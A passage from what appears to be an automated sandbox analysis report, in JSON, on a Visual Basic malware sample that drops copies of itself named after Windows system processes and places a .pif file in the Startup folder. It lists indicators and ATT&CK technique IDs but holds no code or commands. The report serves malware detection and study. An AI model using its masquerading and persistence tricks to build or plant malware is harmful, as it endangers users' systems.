"https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"D3_08.exe\" (UID: 00000000-00005856)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00002060)\n Spawned process \"D3_08.exe\" (UID: 00000000-00006136)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005952)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00006124)\n Spawned process \"D3_08.exe\" (UID: 00000000-00004180)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004284)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004136)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005984)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00006048)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003928)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00004084)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003800)\n Spawned process \"D3_08.exe\" (UID: 00000000-00003456)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00002208)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00004316)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004036)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00001800)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004204)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003820)\n Spawned process \"D3_08.exe\" (UID: 00000000-00003256)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004152)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003232)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00001720)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003424)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"services.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"services.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"D3_08.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"D3_08.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"shell.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"shell.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Data HAPUBWS.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"Data HAPUBWS.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Empty.pif\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"Empty.pif\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"New Folder.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"New Folder.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"WINLOGON.EXE.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"WINLOGON.EXE.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67EE4A6B.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67EE4A6B.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"CSRSS.EXE.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"CSRSS.EXE.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SERVICES.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"SERVICES.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67EE4B2F.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67EE4B2F.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"D3_08.EXE.67EE473F.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"D3_08.EXE.67EE473F.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SMSS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"SMSS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"LSASS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"LSASS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"MrD3_08.scr\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"MrD3_08.scr\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67EE4741.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67EE4741.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to access non-existent file \"C:\\MSVBVM60.DLL\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to access non-existent file \"C:\\SXS.DLL\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to access non-existent file \"C:\\CRYPTSP.dll\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to access non-existent file \"C:\\dwmapi.dll\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\LSASS.exe\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SMSS.EXE\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to access non-existent file \"C:\\Windows\\D3_08.exe\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to access non-existent file \"C:\\D3_08.exe\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to access non-existent file \"C:\\Windows\\system32\\shell.exe\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local.exe\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to touch file \"C:\\MSVBVM60.DLL\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to touch file \"C:\\Windows\\system32\\MSVBVM60.DLL\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to touch file \"C:\\Windows\\system32\\rpcss.dll\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to touch file \"C:\\CRYPTBASE.dll\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to touch file \"C:\\Windows\\system32\\CRYPTBASE.dll\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to touch file \"\\Device\\KsecDD\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to touch file \"C:\\Windows\\system32\\uxtheme.dll\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to touch file \"C:\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe.cfg\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to access non-existent file \"C:\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe.cfg\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to access non-existent file \"C:\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe.Local\\\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" trying to access non-existent file \"C:\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.pif\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" reads file \"c:\\users\\desktop.ini\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" reads file \"c:\\users\\%osuser%\\documents\\desktop.ini\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" reads file \"c:\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" writes file \"c:\\users\\hapubws\\appdata\\local\\services.exe\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" writes file \"c:\\share\\d3_08\\new folder.exe\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" writes file \"c:\\windows\\d3_08.exe\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" writes file \"c:\\d3_08.exe\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" writes file \"c:\\windows\\system32\\shell.exe\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" writes file \"c:\\windows\\system32\\mrd3_08.scr\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" writes file \"c:\\windows\\system32\\iexplorer.exe\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" writes file \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\empty.pif\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\winlogon.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" connecting to \"\\ThemeApiPort\"\n \"D3_08.exe\" connecting to \"\\ThemeApiPort\"\n \"IExplorer.exe\" connecting to \"\\ThemeApiPort\"\n \"CSRSS.EXE\" connecting to \"\\ThemeApiPort\"\n \"LSASS.EXE\" connecting to \"\\ThemeApiPort\"\n \"SMSS.EXE\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" touched file \"C:\\Windows\\D3_08.exe\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" touched file \"C:\\Windows\\System32\\shell.exe\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" touched file \"C:\\Windows\\System32\\MrD3_08.scr\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" touched file \"C:\\Windows\\System32\\IExplorer.exe\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" touched file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\LSASS.EXE\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\LSASS.EXE\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\services.exe\" (UID: 5884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" queries basic process information of the \"C:\\share\\D3_08\\New Folder.exe\" (UID: 5884)\n \"D3_08.exe\" queries basic process information of the \"C:\\Windows\\System32\\tzres.dll\" (UID: 5856)\n \"D3_08.exe\" queries basic process information of the \"C:\\PuRn4m4.txt\" (UID: 5856)\n \"IExplorer.exe\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (UID: 2060)\n \"IExplorer.exe\" queries basic process information of the \"C:\\PuRn4m4.txt\" (UID: 2060)\n \"WINLOGON.EXE\" queries basic process information of the \"C:\\share\" (UID: 6124)\n \"WINLOGON.EXE\" queries basic process information of the \"C:\\Windows\\System32\\tzres.dll\" (UID: 6124)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"services.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"WINLOGON.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67EE4A6B.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"CSRSS.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67EE4B2F.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.EXE.67EE473F.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"MrD3_08.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67EE4741.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"PuRn4m4.txt\" has type \"ASCII text with CRLF line terminators\"- [targetUID: N/A]\n \"lsass.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"smss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"csrss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67EE50BB.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.EXE.67EE4E8F.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00005884)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00002060)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00002060)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00002060)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00006136)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00006136)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00006136)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00005952)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00005952)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00005952)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00006124)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00006124)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00006124)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00004180)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00004180)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00004180)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00004284)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100765059ed7698010000a0010000d21bb801d01bb8010016b8010000b501e414b80188000000880000001768ed769817b801ff2bed7608ade876a41bb801ac011f0000001f000000b501c06db50113009d00b7020000c06db5015016b801100000000000000014009800b7020000c06db501 (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb8875f80e240000f0fd7f9a5cee7600e0fd7f60c6120044f0fd7f00000000400000003f0000001f00000000f0fd7f54c61200c15cee766082f5761f00000000f0fd7f9a5cee7600e0fd7f78c612005789ed768083f5761317ef74d8eb8875 (UID: 00000000-00005884)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb887520dc2b000070fd7f9a5cee7600f0fd7f60c612004470fd7f00000000400000003f000000200000000070fd7f54c61200c15cee766082f576200000000070fd7f9a5cee7600f0fd7f78c612005789ed768083f5761317ef74d8eb8875 (UID: 00000000-00005856)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100765059ed7698010000a0010000d21bdf01d01bdf010016df010000dc01e414df0188000000880000001768ed769817df01ff2bed76038fe876a41bdf01ac011d0000001d000000dc01c06ddc011200a20047020000c06ddc015016df01100000000000000013009d0047020000c06ddc01 (UID: 00000000-00002060)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 